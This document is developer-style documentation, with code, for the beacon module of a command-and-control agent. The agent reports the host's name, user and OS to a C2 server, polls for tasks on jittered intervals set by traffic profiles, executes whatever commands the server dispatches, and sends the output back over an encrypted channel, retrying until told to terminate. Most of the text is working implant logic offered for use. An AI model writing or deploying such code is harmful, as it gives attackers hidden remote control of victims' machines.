
Overview

The beacon.py module implements the agent’s core communication loop. It handles server check-in, task polling, command execution, and exponential backoff retry logic.

Module Location

agent/beacon.py

Classes

BackoffManager

Manages exponential backoff state for retry logic.

Attributes

_SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # delay steps in seconds, capped at 60
attempts: int  # Current retry attempt count

Methods

__init__()
Initializes a new BackoffManager with zero attempts.
def __init__(self):
    self.attempts = 0
compute_delay() -> float
Returns the delay for the current attempt, capped at 60 seconds.
Returns:
  • float: Delay in seconds
Example:
backoff = BackoffManager()
print(backoff.compute_delay())  # 1.0 (first attempt)

backoff.attempts = 3
print(backoff.compute_delay())  # 8.0 (fourth attempt)

backoff.attempts = 10
print(backoff.compute_delay())  # 60.0 (capped)
reset() -> None
Resets attempt counter after a successful operation.
backoff.reset()
assert backoff.attempts == 0
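
The behaviour documented for BackoffManager can be sketched as below. This is a minimal illustration rather than the module's actual source: the index clamping inside compute_delay() is an assumption inferred from the "capped at 60" note and the example outputs above.

```python
class BackoffManager:
    """Tracks retry attempts and maps them onto a fixed delay table."""

    _SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # delay steps in seconds

    def __init__(self) -> None:
        self.attempts = 0

    def compute_delay(self) -> float:
        # Assumed clamping: attempt counts past the end of the table
        # reuse the final (60 s) step instead of raising IndexError.
        index = min(self.attempts, len(self._SEQUENCE) - 1)
        return float(self._SEQUENCE[index])

    def reset(self) -> None:
        self.attempts = 0


backoff = BackoffManager()
delays = []
for _ in range(9):
    delays.append(backoff.compute_delay())
    backoff.attempts += 1

print(delays)  # [1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 60.0, 60.0]
```

A lookup table keeps the cap explicit and avoids computing ever larger powers of two that would be discarded anyway.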

BeaconLoop

Implements the agent’s main communication loop with the C2 server.

Attributes

_session_id: str | None     # Assigned by server after CHECKIN
_key: bytes                 # Session encryption key
_backoff: BackoffManager    # Retry backoff manager
_profile: TrafficProfile    # Loaded traffic profile
_sleep_fn: Callable         # Jitter strategy function

Methods

__init__()
Initializes the beacon loop with crypto keys and traffic profile.
def __init__(self):
    self._session_id  = None
    self._key         = get_session_key()
    self._backoff     = BackoffManager()
    self._profile     = load_active_profile()
    self._sleep_fn    = get_sleep_fn(self._profile.jitter_strategy)
run() -> None
Runs the full beacon loop: check-in, then poll and execute until MSG_TERMINATE is received.
Execution Phases:
Phase 1: Initial Check-in
while True:
    try:
        self._checkin()
        self._reset_backoff()
        break
    except TransportError as e:
        logger.warning('checkin failed', extra={'reason': str(e)})
        self._backoff_sleep(reason=str(e))
Retries check-in with exponential backoff until it succeeds.
Phase 2: Main Beacon Loop
while True:
    # Compute jittered sleep interval
    sleep_s = self._sleep_fn(config.BEACON_INTERVAL_S, self._profile.jitter_pct)
    
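    # Sleep, then send TASK_PULL (construction of pull_payload is not shown in this excerpt)
    time.sleep(sleep_s)
    response = _send(pull_payload, self._key)

    # Handle response (derivation of msg_type from the response is not shown in this excerpt)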
    if msg_type == MSG_TASK_DISPATCH:
        self._handle_task_dispatch(response)
    elif msg_type == MSG_TERMINATE:
        sys.exit(0)
Error Handling:
  • TransportError: Triggers exponential backoff, continues loop
  • Other exceptions: Logged, backoff reset, continues loop
_checkin() -> None
Internal method - sends CHECKIN and stores the session_id assigned by server.
Raises:
  • TransportError: If the response is missing session_id
payload  = _build_checkin_payload()
response = _send(payload, self._key)

self._session_id = (
    response.get('session_id') or
    response.get('payload', {}).get('session_id')
)

if not self._session_id:
    raise TransportError('CHECKIN response missing session_id')
After successful check-in, the logger is updated with the session ID:
logger = update_session(logger, self._session_id)
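
The two-location session_id lookup above can be exercised in isolation. The sketch below uses a hypothetical helper, extract_session_id, which is not part of the module, to show which response shapes yield an ID and which fall through to the TransportError path.

```python
from typing import Optional


def extract_session_id(response: dict) -> Optional[str]:
    """Hypothetical helper: top-level session_id first, nested payload second."""
    return (
        response.get('session_id')
        or response.get('payload', {}).get('session_id')
    )


top_level = extract_session_id({'session_id': 'abc'})
nested = extract_session_id({'payload': {'session_id': 'xyz'}})
missing = extract_session_id({'payload': {}})
empty = extract_session_id({'session_id': ''})

print(top_level, nested, missing, empty)  # abc xyz None None
```

Because the lookup chains with `or`, an empty string at the top level is treated the same as a missing key, so the nested value is consulted next.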
_handle_task_dispatch(response: dict) -> None
Internal method - executes dispatched task and sends result back to server.
Parameters:
  • response (dict): Server response containing task dispatch
Extracted Fields:
inner     = response.get('payload', {})
task_id   = inner.get('task_id', '')
command   = inner.get('command', '')
args      = inner.get('args', [])
timeout_s = inner.get('timeout_s', 30)
Execution Flow:
result = execute(task_id, command, args, timeout_s)

result_payload = mf.build_task_result(
    session_id  = self._session_id,
    task_id     = result.task_id,
    stdout      = result.stdout,
    stderr      = result.stderr,
    exit_code   = result.exit_code,
    duration_ms = result.duration_ms,
)
_send(result_payload, self._key)
_backoff_sleep(reason: str = '') -> None
Internal method - sleeps for current backoff delay and increments attempt count.
Parameters:
  • reason (str): Optional reason for backoff (for logging)
delay = self._backoff.compute_delay()
logger.warning('backing off before retry', extra={
    'backoff_s':  delay,
    'attempt':    self._backoff.attempts + 1,
    'reason':     reason,
})
time.sleep(delay)
self._backoff.attempts = min(
    self._backoff.attempts + 1,
    len(BackoffManager._SEQUENCE) - 1,
)
_reset_backoff() -> None
Internal method - resets backoff attempt counter after successful operation.
self._backoff.reset()

Helper Functions

_build_checkin_payload() -> dict

Builds the CHECKIN payload from current machine info.
Returns:
  • dict: CHECKIN message payload
return mf.build_checkin(
    hostname   = platform.node(),
    username   = getpass.getuser(),
    os_info    = f'{platform.system()} {platform.release()} {platform.version()}',
    agent_ver  = AGENT_VERSION,
    jitter_pct = config.JITTER_PCT,
)

_send(payload: dict, key: bytes) -> dict

Packs, sends, and unpacks a beacon message.
Parameters:
  • payload (dict): Message payload
  • key (bytes): Encryption key
Returns:
  • dict: Server response payload
packed   = mf.pack(payload, key)
raw_resp = send_beacon(BEACON_ENDPOINT, packed)
return mf.unpack(raw_resp, key)

Constants

BEACON_ENDPOINT = f'https://{config.SERVER_HOST}:{config.SERVER_PORT}/beacon'
AGENT_VERSION   = '1.0.0'

Message Types

The beacon loop distinguishes three cases based on the response's message type:

| Type | Action |
| --- | --- |
| MSG_TASK_DISPATCH | Execute task via _handle_task_dispatch() |
| MSG_TERMINATE | Log shutdown message and exit with code 0 |
| Other | Log “no task” and continue loop |

Backoff Sequence

Retry delays in seconds:
Attempt 1: 1s
Attempt 2: 2s
Attempt 3: 4s
Attempt 4: 8s
Attempt 5: 16s
Attempt 6: 32s
Attempt 7+: 60s (capped)
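
To see how long a run of consecutive failures takes in total, the delays can be summed. The sketch below is illustrative only: delay_for is a hypothetical helper that takes the 1-based attempt number used in the list above.

```python
from itertools import accumulate

SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # same steps as BackoffManager._SEQUENCE


def delay_for(attempt_number: int) -> int:
    """Delay in seconds before the given 1-based retry attempt."""
    return SEQUENCE[min(attempt_number, len(SEQUENCE)) - 1]


delays = [delay_for(n) for n in range(1, 11)]
totals = list(accumulate(delays))

print(delays)  # [1, 2, 4, 8, 16, 32, 60, 60, 60, 60]
print(totals)  # [1, 3, 7, 15, 31, 63, 123, 183, 243, 303]
```

After seven failed attempts the cumulative wait is 123 seconds, and each further failure adds a flat 60 seconds.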

Usage Example

from agent.beacon import BeaconLoop

# Initialize and run beacon loop
loop = BeaconLoop()
loop.run()  # Runs until MSG_TERMINATE received

Logging

The beacon loop emits structured logs for all operations:
Check-in:
logger.info('checkin complete', extra={
    'session_id': self._session_id,
    'hostname':   platform.node(),
})
Beacon sent:
logger.info('beacon sent', extra={
    'session_id':         self._session_id,
    'interval_s':         round(sleep_s, 2),
    'jitter_s':           jitter_s,
    'payload_size_bytes': len(packed),
})
Task executed:
logger.info('task executed', extra={
    'task_id':     task_id,
    'exit_code':   result.exit_code,
    'duration_ms': result.duration_ms,
})
Backoff retry:
logger.warning('backing off before retry', extra={
    'backoff_s':  delay,
    'attempt':    self._backoff.attempts + 1,
    'reason':     reason,
    'session_id': self._session_id,
})
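
The log calls above rely on the standard library's `extra` argument, which copies each key onto the LogRecord as an attribute. The sketch below shows one way those attributes might be rendered as JSON. JsonFormatter, ListHandler, and the logger name beacon_demo are hypothetical names for this illustration; the module's real logging setup is not shown in this document.

```python
import json
import logging


class JsonFormatter(logging.Formatter):
    """Hypothetical formatter that emits selected `extra` fields as JSON."""

    FIELDS = ('session_id', 'backoff_s', 'attempt', 'reason')

    def format(self, record: logging.LogRecord) -> str:
        entry = {'level': record.levelname, 'message': record.getMessage()}
        for name in self.FIELDS:
            # Keys passed via `extra` appear as attributes on the record.
            if hasattr(record, name):
                entry[name] = getattr(record, name)
        return json.dumps(entry)


class ListHandler(logging.Handler):
    """Collects formatted lines in memory so the output can be inspected."""

    def __init__(self) -> None:
        super().__init__()
        self.lines = []

    def emit(self, record: logging.LogRecord) -> None:
        self.lines.append(self.format(record))


handler = ListHandler()
handler.setFormatter(JsonFormatter())
demo_logger = logging.getLogger('beacon_demo')
demo_logger.setLevel(logging.INFO)
demo_logger.addHandler(handler)
demo_logger.propagate = False

demo_logger.warning('backing off before retry', extra={
    'backoff_s': 4,
    'attempt':   3,
    'reason':    'timeout',
})
print(handler.lines[0])
```

Keys in `extra` must not collide with built-in LogRecord attributes such as `message` or `name`, otherwise the logging module raises a KeyError.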

Error Recovery

Transport Errors

Network failures trigger exponential backoff:
except TransportError as e:
    logger.warning('transport error', extra={
        'reason':     str(e),
        'session_id': self._session_id,
    })
    self._backoff_sleep(reason=str(e))

Unexpected Errors

Other exceptions are logged but don’t stop the loop:
except Exception as e:
    logger.error('unexpected error in beacon loop', extra={
        'reason':     str(e),
        'traceback':  traceback.format_exc(),
        'session_id': self._session_id,
    })
    self._reset_backoff()
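
The two handlers combine into one try/except with the specific exception listed first. The sketch below is a simplified illustration, not the module's code: TransportError is a local stand-in class, run_once is a hypothetical wrapper, and resetting the backoff on success is an assumption based on the description of reset().

```python
class TransportError(Exception):
    """Local stand-in for the module's transport exception."""


def run_once(operation, backoff_sleep, reset_backoff, events):
    """Run one loop iteration and route failures as described above."""
    try:
        operation()
        reset_backoff()  # assumed: success clears the retry counter
    except TransportError as exc:
        # Network failure: record it, then wait before the next attempt.
        events.append(('transport', str(exc)))
        backoff_sleep(str(exc))
    except Exception as exc:
        # Anything else: record it and reset the backoff, without re-raising.
        events.append(('unexpected', str(exc)))
        reset_backoff()


def network_failure():
    raise TransportError('connection refused')


def parse_failure():
    raise ValueError('bad payload')


events, sleeps, resets = [], [], []
for operation in (network_failure, parse_failure, lambda: None):
    run_once(operation, sleeps.append, lambda: resets.append(1), events)

print(events)       # [('transport', 'connection refused'), ('unexpected', 'bad payload')]
print(sleeps)       # ['connection refused']
print(len(resets))  # 2
```

Listing TransportError before the generic Exception clause matters: Python takes the first matching handler, so reversing the order would send network failures down the reset path and skip the backoff.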

Security Features

  1. End-to-End Encryption: All messages encrypted with _key
  2. Session Isolation: Each agent gets unique session_id
  3. Graceful Shutdown: MSG_TERMINATE cleanly exits the loop
  4. Error Recovery: Network failures don’t crash the agent
